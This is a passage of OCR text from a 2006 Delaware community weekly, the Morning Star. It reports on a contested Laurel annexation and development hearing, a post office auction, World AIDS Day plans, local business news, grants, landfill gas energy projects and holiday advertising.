hearing. Both the Discovery property and the Car Store property are included as possible annexation areas in the town’s Comprehensive Plan, which is approved by the state. A review of the project by the state’s Office of Planning, completed in September, said that the state has no objection to annexation and development of the land. “The state views these parcels as a future part of the town of Laurel and has no objections to the proposed rezoning and development of this parcel in accordance with the relevant codes and ordinances,” the report said. The state did, however, have several objections to the plans as they stand. (See related box.) Doug Warner with the architectural firm Element Design Group, Lewes, said at the public hearing that the project would contain about 1,400 homes as well as more than 1 million square feet of retail space. Discovery would have two stadiums, one with 12,000 seats and the other with 6,000 seats. For comparison, Perdue Stadium in Salisbury has 5,200 seats. Wilmington’s Frawley Stadium in which the Blue Rocks play has 6,500 seats. There would also be two theaters, an amusement park, hotels, parking garages and a number of non-profit facilities. “This is too large-scale for what Laurel needs now,” said Monet Smith, Laurel. “We can’t fill the retail space that is downtown now. We can’t fill Discountland. The old Salisbury Mall is sitting empty. Downtown Salisbury is a beautiful area but it is vacant.” “We need to build on the town that is already here,” added Leslie Carter. “This will create sprawl and do nothing for our existing town center.” But Discovery is exactly what Laurel needs, said area businessman and former head of the Sussex County Economic Development Office Frank Continued on page 5 PAGE 2 SOUTHERN STATES 20689 Sussex Highway, Seaford, DE 302-629-9645 • 1-800-564-5050 Mon.-Fri. 8-6, Sat. 8-4 Stor e… !” m r a F alor e G han a t s t e f r i o “M tmas G s i r h C e We h a v New Items This Year Minnetonka Shoes Leanin’ Tree Cards Jewelry Carhartt Clothing Wolverine Hunting Supplies Breyer Collectibles Largest Selection Around Flags, Candles, Plus Warmers Your Pet Headquarters Science Diet - Dog Sweaters, Coats, Toys, Treats & Much More MORNING STAR ✳ NOVEMBER 23 - 29, 2006 Laurel park will host annual observance of World AIDS Day, Dec. 1 HIV/AIDS seems to be less and less on The Sussex County AIDS Council the minds of Americans and Delawareans. (SCAC) will hold its third annual World However, the number of HIV/AIDS cases AIDS Day observance at the Downtown continues to increase. Laurel Park at 6:30 p.m. on Friday, Dec. In Delaware, about 3,500 people have 1. The public is invited. been diagnosed with AIDS and nearly Each year on World AIDS Day, hun1,500 have died from the disease since the dreds of people in Sussex County, and first cases were reported in 1986. Since hundreds of thousands of people around the world, join together to remember those tracking began in 2003, more than 1,100 people in Delaware have tested positive lost to AIDS and to renew the public’s for HIV. promise of support for those living with “Each year on and at-risk for this day we pause to HIV/AIDS. remember and celeSCAC’s World ‘World AIDS Day reminds us all brate the lives of AIDS Day obserthose affected by vance will begin that HIV has not gone away, and HIV/AIDS,” said with a brief program that there are many things still to Wade Jones, at the Downtown HIV/AIDS prevenLaurel Park. This be done to educate about HIV, tion program manwill feature special ager with SCAC. comments, music reduce the rate of HIV infection, “World AIDS Day and “The Reading of reminds us all that the Names,” which and provide needed support for HIV has not gone is one of the most away, and that there moving parts of the those in Sussex County living are many things still evening’s program. to be done to eduThe names of with HIV/AIDS.’ cate about HIV, repeople lost to AIDS, duce the rate of HIV submitted to SCAC infection, and proover the past several Wade Jones vide needed support years, are read HIV/AIDS prevention program for those in Sussex aloud. Names may manager, Sussex County AIDS County living with be submitted for this Council HIV/AIDS.” reading by calling the SCAC office at The Delaware (302) 644-1090 or Division of Public by e-mail at info@scacinc.org. Health, Kent Sussex Counseling Services, Following the program, a Candlelight and LaRed Medical Center are participatWalk of Remembrance will move along ing with SCAC in this year’s World AIDS Delaware Avenue to the Janosik Park Day observance in Laurel. Sponsors of the where walkers may pause to toss flowers evening’s program include the Town of into Broad Creek in memory of those lost Laurel, Mercantile Bank of Rehoboth to AIDS. Accents Florist and Givens Beach, Pizza King in Laurel, and Subway Flowers & Gifts, both in Laurel, have doin Seaford. nated flowers for this special rememSCAC provides supportive services, inbrance. cluding emergency financial assistance for The walk will conclude back at the housing, transportation to medical apDowntown Laurel Park. Walkers are invitpointments and supplemental food, to ed to the nearby Centenary United more than 200 people in Sussex County Methodist Church afterward for refreshliving with HIV/AIDS. SCAC also eduments and fellowship. cates the public about HIV infection and It has been more than 25 years since its prevention, and advocates for clients the first case of AIDS was diagnosed and experiencing hardship. HIV was identified. Today, the issue of 500 W. Stein Highway • FAX (302)629-4513 • 22128 Sussex Highway • Seaford, DE 19973 • Fax (302)628-8504 (302)629-4514 • (302)628-8500 • (800)966-4514 • w Ne g! tin Lis Large in-town colonial - 4 BRs, 2 full & 2 half baths, huge master w/fireplace & cedar closet. Updated kit., great formal DR, all on a tidy well-landscaped yard with a view of the golf course!!! A true must see! Home Warranty included. $279,000 MLS # 541133 Happy Thanksgiving Karen Hamilton Member of President’s Club karensellshouses@comcast.net MORNING STAR PAGE 3 Castle announces two grants for volunteer firefighter assistance Congressman Mike Castle recently announced two key grants for volunteer firefighter assistance totaling $268,900. The first award of $134,950 will go to the Delaware Volunteer Firemen's Association through the Staffing for Adequate Fire and Emergency Response (SAFER) program. This award is administered by the Department of Homeland Security's Office of Grants and Training in cooperation with the U.S. Fire Administration. This grant will be used for strategic planning in the Delaware Volunteer Firefighter Association's Recruitment and Retention programs which marks the first part of a proposed four-year plan. The second grant of $133,950 goes to the Townsend Fire Company for operations and safety. They will purchase various pieces of protective clothing to outfit 50 firefighters and EMS personnel during a fire or rescue. This clothing includes gear to protect firefighters from blood born pathogens and any bio-hazard materials, gloves and headgear for protection from the heat and protective boots. Denn releases Guide to Insurance Issues for Military Personnel Insurance Commissioner Matt Denn marked Veterans Day with the release of a new guide to insurance issues for military personnel. “I developed this guide to address some of the unique and specific situations that may be faced by members of the military whether active duty, Reserves or the National Guard when it comes to insurance,” Commissioner Denn said. The Instant Insurance Guide: Military includes topics such as: the war exclusion that is part of many life insurance policies; the vacancy clause that might be triggered under a homeowners insurance policy if a home is left vacant during an extended deployment; and the possibility of suspending portions of auto insurance coverage during deployment. The guide can be found online at under military personnel or printed copies can be obtained by calling 1-800-282-8611. The guide is part of a series of insurance guides including auto, homeowners, life, health, and people with disabilities published by Commissioner Denn. Your Appliance Headquarters BURTON BROS. HARDWARE, INC. The Area’s Oldest Hardware Store” 407 High St., Seaford, DE 302 629-8595 PAGE 4 MORNING STAR ✳ NOVEMBER 23 - 29, 2006 Old post office building brings $304,500 at auction Buyer is with an area insurance company By Lynn R. Parks “Somebody’s going to own an old fallout shelter in about five minutes,” said auctioneer Doug Marshall. That was at 5:25 p.m. last Thursday, about two minutes before the auction of the old Laurel Post Office on Central Avenue was set to start. It took longer than five minutes. In fact, the auction, during which four people submitted bids, was the one of the longest single-parcel auctions Marshall had ever conducted. But at the end, about 34 minutes after the first call for a bid went out, Ned Fowler of The Insurance Market was the new, proud owner of an old fallout shelter. Buying price: $304,500. Fowler, the only bidding person among several representatives of The Insurance Market present at the auction, said that the building would be used by the company. He declined further comment. The old post office was built in 1935. Kevin and Pat Taaffe bought the building in 2002 and renovated it into five offices and one office suite. Pat Taaffe used the suite for her accounting firm, Edwards Taaffe and Company. She retired and sold her firm last year to George T. Walker, who renamed it G. T. Walker and Associates. That firm will move in December to an office in Laureltowne. Marshall started the auction, which was held in the post office lobby, promptly at 5:27 p.m., as promised. Bidding started at 5:45 p.m., after Marshall explained the terms of the sale. “It doesn’t get any better than this,” he said, then asked for an opening bid of $500,000. After getting no response, he asked for $400,000. Then $375,000. $350,000. $325,000. And so it went, until he was down to $175,000. “The lower they start, the more they bring,” he cautioned his audience. Finally, someone tossed out a bid: $100,000. “We’ve got a long way to go this way,” Marshall said. And a long way it was. The bid jumped to $130,000, then in $10,000 increments to $160,000. Fowler’s first bid was for $165,000. Slowly it crept up, by $5,000 then. Ned Fowler (right) of The Insurance Market receives a round of applause after making the high bid for the old Laurel Post Office building. Below, those gathered for the auction listen to instructions from auctioneer Doug Marshall, right. Photos by Pat Murphy Kevin Taaffe, former owner of the old Laurel Post Office building, looks over the main counter as the building is auctioned. The sale Thursday evening brought $304,500. Photo by Pat Murphy $2,500. “I thought I’d be at $400,000 by now,” Marshall said after Fowler bid $197,500. After Fowler bid $257,000, Marshall made his third and final call for more bids. The only remaining bidder, Fred Tana, a Lewes-area developer who was placing bids by phone, threw $500 more dollars in the pot, bringing the bid to $257,500. The bids went up from there in $500 or $1,000 increments, Tana taking his time and Fowler never hesitating. “Thanks for making me work this hard,” Marshall said when the bid stood at $295,000. “I sold a $9 million piece of land and it took less time than this,” he said after Fowler agreed to $303,500. At 6:19, Tana told his proxy that he was finished. Marshall, after receiving no further bids, declared the property sold. The nearly two dozen people who had watched the proceedings gave Fowler a round of applause. “When we got over $300,000, I felt a lot better than I did when I was floundering around at $199,000,” Marshall said Friday morning. “I was happy to see that number.” Getting Married Soon? Know Someone Who Is? Stop By The STAR Office 628 W. Stein Hwy., Seaford (Next to Medicine Shoppe) For A FREE Copy of Our Bridal Planner 629-9788 “31 Years Build ing A Heritage 555 North Hal Seaford, DE l St. 19973 629-5698 of Quality and Trust” Hours: M-Th 10-5:3 Fri. 10-8; Sat. 10 0 -2 MORNING STAR ✳ NOVEMBER 23 - 29, 2006 Calio says Laurel needs to grow Continued from page one Calio. “I strongly believe we need a new direction and a chance to grow,” he said. “This could be a new beginning for Laurel and will bring people here who will contribute to the community, not be a drain on society.” Calio urged the council, of which his son, Chris, is a member, to OK the development. “Do what other councils before you have not had the courage to do,” he said. “See beyond your noses and say that things have to change around here.” Larry Calhoun also spoke in favor of the project. “Laurel should be moving along a little bit better than it is,” he said. “I might not live to see the end of this project, but it will be here for my children and my grandchildren and for the future of this community.” Calhoun said that the town can use the revenue that property taxes from Discovery would generate. “I am so tired of living in a town where we need more revenue to fix things,” Calhoun said. But the vast majority of people at the hearing were opposed to the project. At the start of the hearing, when Mayor John Shwed asked people who were for the project to raise their 2.19. erate up to 10,000 jobs. “Do we really need more shopping in the area?” she added. “Do we really need another Target?” Many people talked about how the area will be changed with Discovery. “With this project, Laurel will be changed forever and the results will be disastrous,” Carter said. Randy Meadows, who at a previous meeting showing pictures of wildlife in the fields around his home, once again appealed for conservation of the land. “If this goes through, I’m going to be looking out my kitchen window at a parking garage,” he said. “How would you guys like that, after looking out at a beautiful field?” “If living in a rural area is where you’re going to be happy, look at what this is doing,” said Ray Emory. “I didn’t buy my land to be living in a town. But the town is coming to me.” For your information: The town council will discuss the annexation of the Discovery property and its development under the large parcel zone at its next meeting, Dec. 4. If the council votes on the proposal at that time, it would only be on a first hearing. A final vote on the proposal could come 30 days following that initial vote. Office of Planning recommends some changes in project By Lynn R. Parks In its review of the proposed Discovery project, completed Sept. 20, the state’s Office of Planning, while voicing no objection to annexation and development of the property, made several recommendations for modification of the plans. They include: Additional buffers around some stormwater management ponds Elimination of proposed intersections that are not at right angles Better protection of wetlands Realignment of tax ditches to eliminate conflicts with rights-of-way Better protection of forested areas Inclusion of a walking trail system Landscaping to buffer nearby historic properties Implementation of a program to plant trees to replace those that are lost to construction The state wants to be able to explore the site, to deter- mine if it is home to any endangered plants or animals. A foraging area for the Cooper’s hawk, a state-endangered bird, is nearby and could extend into the Discovery property as well, the state says. “Efforts to reduce forest fragmentation should be made,” the report says. The developer was also asked to develop a mechanism to ensure that the 400 homes that are to be set aside for first-time home buyers actually be accessible to that group. “Often proposals come through with units set aside for first-time homebuyers,” the report says. “However, when the units are actually built, their price is out of reach for this target population.” As for area schools, the report estimates that Discovery will mean an additional 700 students in the Laurel School District. “The district does not have adequate student capacity to accommodate the additional students likely to be generated from this development,” it says. The report encourages the developers to talk with the district and to consider donation of land for construction of a school. The complete report is available at the website. SAVE WE DO IT ALL When You Pay Cash On Delivery Or Pre-Pay For Your Fuel Delivery Call Toll Free Carlton B. Whaley & Sons did a really nice job; we are very pleased. Professionally done! Doug & Susan Pusey (866) 423-0781 1616 NORTHWOOD DR., SALISBURY, MD 21801 Serving Wicomico, Worcester & Somerset Counties In Maryland & Sussex County Delaware “We couldn’t ask for anything better, there were no hidden costs. We are well pleased. Doug & Pia Calhoun COLORED STEEL We Also Carry Colored Metal and Trim FINANCING AVAILABLE DESIGNED, BUILT & PRICED RIGHT CARLTON B. WH WHALEY ALEY & SONS 302 875-2939 LAUREL, DE LETS TALK BUILDINGS! - JUST 4 MILES EAST OF LAUREL. RESIDENTIAL & COMMERCIAL $ hands, about 10 hands went into the air. When he asked those who were opposed to the project to raise their hands, more than 100 did so. Several people came to the hearing to get more information about the project. David Edwards Jr. had a list of questions focused on taxes and infrastructure. “When will the new taxes begin to flow into the town’s treasury?” he asked. He also wondered if it would be more cost effective to allow Discovery to use a proposed county sewer rather than the town’s wastewater treatment plant. On several occasions, Shwed told those with questions that he would respond to them later. “At this point, you should have the answers to all of these questions,” countered Sylvia Brohawn. “You need to slow this down and get more information so you can give us proper answers.” Elly Shacker listed a number of studies she would like the town to do before OK’ing Discovery. They included analysis of crime increases that would come with the growth, whether area hospitals are equipped to handle in increase in population and where the people will live who will work in the Discovery stores. The developers have estimated that the complex will gen- PAGE 5 MORNING STAR ✳ NOVEMBER 23 - 29, 2006 PAGE 6 Business Mountain Mudd is spreading on the peninsula By Cindy Lyons Taylor That little green and white cabin replica with the welcoming lighted trees, sitting in the parking lot of the Ace Hardware store in Seaford, is not Santa’s house. It is Mountain Mudd, a franchise that offers specialty coffee. General Manager Mike Riley says business is “going well” and the response has been favorable, once customers realize what it offers. He’s amused by the comments he hears when informed that some people thought it was Santa’s spot, among other things. “They’re catching on,” he says. Riley and his family also operate the coffee booths in Millsboro and in Georgetown. By mid-November, Mountain Mudd will open a fourth site in Laurel on Route 13, in the parking lot of the former Discountland. Mountain Mudd coffee is beginning to attract attention here, as it has in the Mid West. “It’s a growing trend here on the Shore,” Riley says, commenting that he loves the fact that he can “get espresso now, without driving to the beach.” He adds that it is the quality of the coffee, along with the convenience, that keeps customers coming back. They tell him it’s the “best they’ve ever had.” Riley says that acceptance in the towns has been great. People have already approached him with ideas about doing fundraisers for schools, and other causes. Mountain Mudd supported a fundraiser for a young cancer patient in October. The idea to bring Mountain Mudd to the area originated with Riley’s father, John Riley, whose business connections brought his attention to the franchises. He witnessed the demand for the product, so he decided to introduce it here. It’s a family affair. Riley says that the large family, which includes 11 siblings, operates the core of the business, but they have hired other help. His mother and three sisters are involved in the day-to-day aspects, but the entire family helps out, including his wife, a teacher in the Laurel School District. “Sometimes it gets crazy, but it’s fun,” he says. From the menu, customers can choose any flavor combination, hot or iced. Flavors include Milky Way, and other popular candy bar flavors, tropical flavors, and traditional flavors like hazelnut, mint, mocha, or vanilla, and much more. Brewed tea is included on the menu, hot or iced, in flavors like peppermint and lemon. Riley points out that frozen drinks are also available in over 20 flavors. Many varieties of beverages are available. “Conservative or crazy, the combinations are endless,” he says. Each day there are different specials. Individually wrapped muffins and biscotti are sold as accompaniments. All of the beverages are made with water from the Georgia House that has undergone a hi-tech purification system. Customers return, often with big orders. Some local offices, including those of the medical profession, bring lists for the whole office group. Mountain Mudd was founded in Montana, and now the little “kiosks,” as the company calls them, in 22 states. The coffee is oak-roasted following the Italian tradition of master roaster Carlo Di Ruocco, giving it a rich, smooth taste that is without harsh acidity. The Riley’s goal is to bring more and more Mountain Mudd kiosks to the area, especially in the beach resort area. More are moving into spots in southern Maryland, with Salisbury a site focus. Mountain Mudd is open at all sites from 6 a.m. to 6 p.m., except in Seaford, where hours are 7 a.m. to 6 p.m. The business is closed on Sunday. Delmarva Poultry Industry creates electric buying group Delmarva Poultry Industry, Inc.(DPI), the trade association for the peninsula's broiler chicken industry, is creating an electric buying group to help its members lower their electric bills. "Rising electric bills, caused by rising rates and greater consumption, have created a difficult situation for many DPI members, particularly poultry growers," noted DPI president Roger Marino. "In response to members' concerns, we began an effort in September Inflation adjustments announced Personal exemptions and standard deductions will rise, tax brackets will widen and income limits for IRAs will increase in 2007, announces the Internal Revenue Service. By law, the dollar amounts for a variety of tax provisions must be revised each year to keep pace with inflation. Key changes affecting 2007 returns, filed by most taxpayers in early 2008, include the following: • The value of each personal and dependency exemption, available to most taxpayers, will be $3,400, up $100. • The new standard deduction will be $10,700 for married couples filing a joint return (up $400), $5,350 for singles and married individuals filing separately (up $200) and $7,850 for heads of household (up $300). •. to design a program to help all our members throughout Delmarva. Unfortunately, because of legal and market conditions, we will be unable to offer lower electric rates for many of our members, but Delmarva Power customers in Delaware and Maryland should be able to benefit," president Marino stated. DPI has mailed information packets to more than 2,000 members and will hold educational meetings in the coming days to inform members about the program and give them an opportunity to enroll. Persons interested in attending any of the meetings must make reservations by contacting the DPI office. A meeting to discuss the effort will be held on Tuesday, Nov. 28, 8:30-10:30 a.m. at the University of Delaware Research and Education Center, 16684 County Seat Highway, Georgetown. DPI hopes to go to the wholesale electric market in mid-December and seek bids from interested suppliers. On a date to be determined, individual DPI members will accept or reject the submitted bid. More information about the process is Visit Us On The WEB! “The ! Store” S u p e rOffice 600 Norman Eskridge Highway Seaford, DE 19973 (302) 629-6789 available on the DPI website. Individuals and businesses that are not DPI members can join by Dec. 1 to qualify for this program. For membership information or to register for one of the educational meetings, persons can contact the DPI office at 800878-2449. PAGE 7 MORNING STAR ✳ NOV. 23 - 29, 2006 Diamond State Drive-In Theater US Harrington, Del. 302-284-8307 SCHEDULE SHOWN IS FOR WEDNESDAY 11/22 THRU SUNDAY 11/26 WEDNESDAY THRU SUNDAY Deck The Halls . . . . . . . . . . . . . . . . . . . . . . .PG . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .7:00 Happy Feet . . . . . . . . . . . . . . . . . . . . . . . . .G . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .8:45 SATURDAY Deck The Halls . . . . . . . . . . . . . . . . . . . . . . .PG . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .5:30 Happy Feet . . . . . . . . . . . . . . . . . . . . . . . . .G . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .7:15 The Santa Claus 3: The Escape Claus . . . . .G . . . . . . . . . . . . . . . . . . . . . . .Sat. 7:00, Sun. 7:30 SUNDAY Deck The Halls . . . . . . . . . . . . . . . . . . . . . . .PG . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .5:30 Happy Feet . . . . . . . . . . . . . . . . . . . . . . . . .G . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .7:15 Clayton Theater Dagsboro, Del. 20 732-3744 SCHEDULE SHOWN IS FOR FRIDAY 11/24 THRU THURSDAY 11/30 CLOSED MON. & TUES. The Santa Clause, The Escape Claus . . . . .G . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7:30 Regal Salisbury Stadium 16 2322 N. Salisbury Blvd., Salisbury, MD, 410-860-1370 The Movies At Midway Rt. 1, Midway Shopping Ctr., Rehoboth Beach, 645-0200 UPDATED SCHEDULE WAS NOT AVAILABLE AS OF PRESS TIME FOR SUBSCRIPTION SAVINGS COUPON or CHANGE OF ADDRESS Fri., Sat., & Sun., Nov. 24, 25, 26th 20% DISCOUNT ALL 3 DAYS • Refreshments Door Prizes - Free House Plant 1 plant per family - discount excludes live & cut trees Compare Our Quality, Variety & Low Prices! TREES! The Freshest Cut and Live Trees on the Shore o 100’s T e s o Cho m Fro including Douglas Fir, Fraser Fir, remium P White Pine and Blue Spruce. Grade These beautiful trees arrive Nov. 24th LOWEST PRICES ON THE SHORE FOR POINSETTIAS UPDATED SCHEDULE WAS NOT AVAILABLE AS OF PRESS TIME OPEN HOUSE WE GROW OUR OWN! ALL COLORS Priced From $1.75 & Up! 4 1/2” Pot 3-5 Blooms: $2.75 Ea. or 2 Pots for $5. 5” Pot - 4-8 Blooms: $4.25 Ea. or 2 Pots for $8. LARGER SIZES ALSO AVAILABLE • Hundreds of custom made • Foliage Plants - All wreaths and artificial Varietes 95¢ & Up poinsettieas for Home or • Natural Wreaths & Memorials Roping - All Prices • Hanging Baskets - All • From our Gift Shop: varieties The lowest prices in • Christmas Cactus, the area on Cyclamen, Ornamental Christmas Wreaths, Peppers, African Violets, Arrangements, Rieger Begonias, Silk & Dried Ferns, etc. Arrangements. May you enjoy an abundance of blessings this Thanksgiving. We are sincerely grateful for your continued and loyal support. Largest and Healthiest Selection on the Shore The Star THOUSANDS TO CHOOSE FROM! AUTHENTIC MEXICAN BUY ONE LUNCH Menu Items 1-13 or BUY ONE DINNER CO RE UPO QU N IR ED Combo Items 1-21 GET SECOND MEXICAN BEERS DOMESTIC BEERS DAILY DRINK 501 N. Dual Hwy., Seaford, DE - Old English’s Bldg. SPECIALS 302-628-9701 1/2 PRICE EVERY MONDAY Cactus Margaritas $2.50 REG. $4 Lime Only Open Mon. - Fri. 11 am - 2:30 pm (Siesta) 5 pm - 10 pm, Sat. Noon to 10 pm, Sun. Noon - 9 pm ENTER TO WIN STAR’S $500 GIVE-AWAY SEAFORD LOCATION Cambridge, MD 315 Sunburst Hwy. 410-228-7808 Ocean City, MD 12534 Ocean Gateway, 410-213-7324 Salisbury, MD 1045 S. Salisbury Blvd. 410-749-4303 Easton, MD 7813 Ocean Gateway, 410-770-8550 Chestertown, MD 715 Washington Ave. 410-810-1952 JEFF’S GREENHOUSES & GIFT SHOP Main St., Bethel, DE 302- 875-3420 • 1-800-276-3420 MONDAY THRU SATURDAY 8-5 SUNDAY 12-4 DON’T MISS OUR OPEN HOUSE TangerOutlets ® after thanksgiving sale Biggest OUTLET SAVINGS of the SEASON! NOVEMBER 24 - 26 Friday, November 24- 8am-9pm Saturday, November 25- 9am-9pm Sunday, November 26- 11am-7pm Select stores open even earlier. Log on to for a complete list of store specials & hours. buy direct from over 130 brand name outlets FREE SHUTTLE SERVICE FRIDAY-SUNDAY AMONG TANGER’S 3 LOCATIONS ON COASTAL HIGHWAY ROUTE 1 Rehoboth Beach, Delaware ❘ Route 1 to Rehoboth Beach ❘ 302-226-9223 MORNING STAR ✳ NOVEMBER 23 - 29, 2006 PAGE 9 OHS awards the Smart Drive program creator The Delaware Office of Highway Safety recently presented businessman Julian "Pete" Booker with a national safety award for his efforts to reduce teen crashes in Delaware at the YELL (Youth to Eliminate Loss of Life) annual conference in Dover. Booker was one of five individuals or groups of people selected to receive the Governor’s Highway Safety Association (GHSA) Peter K. O’Roarke Special Achievement Award. The O’Roarke Special Achievement Awards recognize achievements in the field of highway safety. OHS nominated Booker for the O’Roarke Award for his work in the creation and implementation of the Smart Drive program. Smart Drive is an educational program for 11th and 12 grade high school students which focuses on re-enforcing safe driving behaviors and techniques originally learned in driver education. Booker, the president and CEO of Delmarva Broadcasting Company, came up with the concept for the program in 2004 after several fatal crashes involving teen drivers. One of those crashes hit close to home as one of the victims was a friend of his son. So Booker brought together a partnership of several safety "experts" including OHS, the Delaware State Police, the Attorney General’s Office AAA Mid-Atlantic, the Delaware Safety Council and driver education teachers to develop a format for a program to remind teen drivers about how to make smart and safe decisions behind the wheel. The result was a series of monthly modules involving both written and hands on activities that must be completed by both the student and parent. Topics range from impaired driving to driving in rain and snow conditions. A wide array of prizes and incentives were available to those who participated in and completed the program, including a special concert staged by Delmarva Broadcasting. Other unique features of the program include a student advisory panel formed at each participating school, as well as the creation of the Smart Drive website for schools and students to find additional support and information. Originally rolled out assembly style in 16 Delaware high schools in 2005, Smart Drive has quickly expanded to 32 high schools statewide this year. Smart Drive is primarily privately funded, with Delmarva Broadcasting leveraging most of its resources to keep the program afloat. The Smart Drive safety partners, including OHS, provided not only time but also informational and incentive support to the program. To learn more about the program, visit. The GHSA is the states' voice on highway safety. The nonprofit association represents the highway safety offices of states and territories. These offices work to change the behavior of drivers and other road users in order to reduce motor vehicle-related deaths and injuries. Areas of focus include: occupant protection, impaired driving and speed enforcement, as well as motorcycle, pedestrian and bicycle safety, and traffic records. The association provides a collective voice for the states in working with Congress and the federal agencies to address the nation’s highway safety challenges. $127 million in bonds sold The Department of Transportation (DelDOT) announces the successful sale of $127 million of Delaware Transportation Authority bonds, and an upgraded bond rating from Standard & Poor’s. The transportation System senior Revenue Bond Series 2006 were issued to provide additional funds for the capital transportation program. UBS Securities LLC was the winning bidder among the seven underwriting syndicates that participated. The True Interest Cost (TIC) was 4.10 percent for the sale. The bonds were upgraded from AA to AA+ by Standard & Poor’s, and remained at last year’s Aa3 rating by Moody’s. This upgraded rating essentially means we can borrow for less, which saves the taxpayer money in the long run. Both rating agencies also reported a “stable” outlook for the transportation system revenue bonds. Regarding the Bond sale, DelDOT secretary Carolann Wicks stated, “This reaffirms that DelDOT has a sound and well managed financial plan. Still, we have implemented a variety of new and improved internal measures that will ensure our ratings remain solid and our bond sales remain significant.” 500 W. Stein Highway • FAX (302)629-4513 • 22128 Sussex Highway • Seaford, DE 19973 • Fax (302)628-8504 (302)629-4514 • (302)628-8500 • (800)966-4514 • Wishing you a happy and bountiful Thanksgiving. I am thankful for your business and look forward to helping you in the future. Sue Bramhall CRS, ABR, CIPS, GRI, SRES 500 W. Stein Hwy. (Rt.20 W.), Seaford, DE sue@suebramhall.com 629-4514 EXT. 246 MORNING STAR ✳ NOVEMBER 23 - 29, 2006 PAGE 10 Delaware landfills will make gas from decomposing organic waste Two solid waste landfills are about to take center stage in the ultimate recycling project – using the landfill gas generated from decomposing organic waste to produce renewable energy. The landfills, located in Kent and Sussex Counties, are owned and operated by the Delaware Solid Waste Authority (DSWA). “Reducing the burden on the environment and recycling all possible waste products is central to DSWA’s mission,” said N.C. Vasuki, DSWA’s CEO. “The landfill gas-to-energy projects successfully utilize a resource that would have otherwise been wasted, and in the process, produce benefits for the landfill, the environment, and the local community.” DSWA had the vision to recycle the landfill gas in a beneficial way, and selected Ameresco, an energy service company with an expertise in landfill gas project development, to make that vision a reality. Ameresco developed, owns, and operates the two multi-million dollar landfill gasto-energy power plants at DSWA’s Southern and Central Landfills. Thousands of tons of naturally occurring methane, a potent greenhouse gas, will now be captured and converted into “green” electricity. “With these two new plants coming into service, DSWA once again demonstrates its vision and commitment to environmental leadership” said George P. Sakellaris, President and CEO, Ameresco. “Ameresco is proud to be a part of such a forward looking project, especially one that has such tremendous community and environmental benefits.” Developing new sources of renewable energy will lead to improved local and global air quality by offsetting the need to use other, more polluting fuels for energy. The Delaware projects will reduce direct and indirect greenhouse gas emissions by approximately 60,000 tons a year, a local environmental benefit equivalent to removing more than 60,000 cars from Delaware’s roads, or offsetting the use of over 1,500 rail cars of coal annually. Until now, the methane gas was safely extracted at the landfill sites through wells and pipes buried in the landfills and combusted in a flare. The gas will now be diverted from the flare to the landfill gas plants equipped with specialized GE/Jenbacher engines designed to burn nonpipeline gases such as landfill gas. The seven engines are expected to produce a combined 7.4 megawatts (MWs) of electricity – enough to meet the annual power needs of over 4,500 homes. Constellation NewEnergy, North America’s largest competitive power supplier, has signed a 10-year agreement to purchase the power from the two plants. “Constellation NewEnergy is excited to partner with DSWA, Ameresco, and GE to bring these renewable energy sources online,” said Constellation NewEnergy’s Bruce McLeish, Vice President, Wholesale Origination. “The competitive power market in Delaware is expanding rapidly and competition is driving these innovations in renewable energy.” The State of Delaware has a renewable portfolio standard which requires power providers to have 10 percent of their power come from renewable resources by 2019. Northeast Energy Systems, GE Energy’s Jenbacher distributor for the northeast region, provided the engine-generator sets, application engineering, and will provide parts and service support for operations. “Northeast Energy Systems (NES) shares the project partners’ interest in renewable energy project development, and we are proud to deliver the best available technology for green power production,” said Al Clark, Vice President-General Manager. GE’s Energy Financial Services unit is financing the project and noted the positive impact on the environment. “Combining our financing and equipment, the Delaware landfill gas projects demonstrate how GE’s ecomagination initiative is helping customers meet environmental challenges,” said Kevin Walsh, a managing director and leader of renewable energy investments at GE Energy Financial Services, which financed the purchase of the gas-to-energy engines. Ecomagination is GE’s commitment to expand its portfolio of cleaner energy products while reducing its own greenhouse gas emissions. Governor Ruth Ann Minner applauded the public/private partnership and its positive impact on the environment and the State of Delaware. “The launch of these two landfill gas projects marks a new era for alternative energy in Delaware,” Governor Minner said. “By creating more diversity in our energy supply choices, we are setting the stage for improving our environment and our economy.” Richard Pryor, Chairman of DSWA concluded, “Producing green power from landfill gas is a win-win for the environment and the community. And for DSWA, it is the ultimate in recycling. We are proud to partner with these companies and support this visionary project.” C O U N T RY AC C E S S O R I E S & GIFTS 302 875-6922 11465 Sycamore Rd. Laurel, DE 1/2 mile from Rt. 13 Candlelight Open House Friday, Dec. 8th 6-8 pm IT’S CLUCK BUCK WEEKEND Fri., Dec. 8 th - 10 th Trim A Tree & Holiday Decorations Swags & Garland • Ornaments Holiday Flags • Table Decor GIFT IDEAS • Framed Art • Yankee Candles • Gourmet Foods • Stoneware • Lang Calendars We do gift baskets MEN’S NIGHT OUT THURSDAY DEC. 14TH 6-8 PM OPEN DAILY Mon. - Sat. 10 am - 5:30 pm Sunday 12-4 A Little Bit Of Country, Just Down The Road SUSSEX HABITAT BUILDING NEW OFFICE - Senator Thomas Carper joined USDA Rural Development officials for the announcement of funds that will help support a new office location for Sussex County Habitat for Humanity. Through Rural Development’s community facility program, a $650,000 loan will help Sussex County Habitat for Humanity move from cramped office conditions rented on Bridgeville Road to new construction just south of town. USDA Rural Development has over 40 programs to support rural affordable housing opportunities, business development, community facilities, and the environment. Construction is set to begin on the new office in the spring and representatives from Habitat for Humanity are speaking with area builders who may partner with them to lead the project. Volunteers will help build the new office. Over 500 volunteers a year work on their housing worksites. Currently, projects are ongoing in Georgetown, Lewes and Concord Village in Seaford. From left to right in front of their current office in Georgetown is Kevin Smith representing senator Joseph Biden; mayor Michael Wyatt; senator Thomas Carper; Sussex County Habitat for Humanity representatives Sandy Spence, treasurer and Kevin Gilmore, executive director; USDA Rural Development state director Marlene Elliott; and Kate Rohrer representing congressman Michael Castle. MORNING STAR ✳ NOVEMBER 23 - 29, 2006 PAGE 11 For authentic Thanksgiving dinner, don’t forget the corn The history of Thanksgiving cannot be told without acknowledging the influence of the native Indian population. The relationship between Pilgrim settlers and Indians was much more complex than the romanticized popular version but even though the Indians did not fully trust these new arrivals, their religion dictated that they treat all with hospitality and respect. It may have been out of that religious In a bowl, stir together the two cans of sense 